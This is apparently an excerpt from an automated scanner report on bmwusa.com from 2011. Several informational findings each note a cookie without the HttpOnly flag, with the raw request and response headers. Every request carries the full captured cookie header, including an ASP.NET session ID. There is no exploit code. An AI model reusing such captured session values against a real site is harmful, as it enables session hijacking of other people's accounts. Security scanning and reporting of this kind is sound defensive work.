Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:56:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:16:14 GMT;path=/
Content-Length: 215086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.262. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535ixdrivegt/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:07 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535ixdrivegt/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:55:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:07 GMT;path=/
Content-Length: 215087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.263. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535ixdrivegt/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:16:01 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535ixdrivegt/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:56:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:16:01 GMT;path=/
Content-Length: 229148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.264. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:20 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:55:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:20 GMT;path=/
Content-Length: 215501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.265. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:12 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:55:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:12 GMT;path=/
Content-Length: 215502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.266. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/5seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535ixdrivesedan/5seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:05:22 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535ixdrivesedan/5seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:45:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:05:22 GMT;path=/
Content-Length: 201982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.267. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535ixdrivesedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:05:00 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535ixdrivesedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:45:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:05:00 GMT;path=/
Content-Length: 214938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.268. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535ixdrivesedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:05:32 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535ixdrivesedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:45:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:05:32 GMT;path=/
Content-Length: 227353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.269. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/535ixdrivesedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:05:18 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535ixdrivesedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:45:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:05:18 GMT;path=/
Content-Length: 216385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.270. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/5seriesgranturismomediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550igt/5seriesgranturismomediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:19:51 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550igt/5seriesgranturismomediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:59:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:19:51 GMT;path=/
Content-Length: 202083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.271. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550igt/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:18:40 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550igt/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:58:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:18:40 GMT;path=/
Content-Length: 213862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.272. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:20:22 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:00:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:20:22 GMT;path=/
Content-Length: 228676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.273. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:20:14 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:00:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:20:14 GMT;path=/
Content-Length: 228677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.274. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:19:35 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
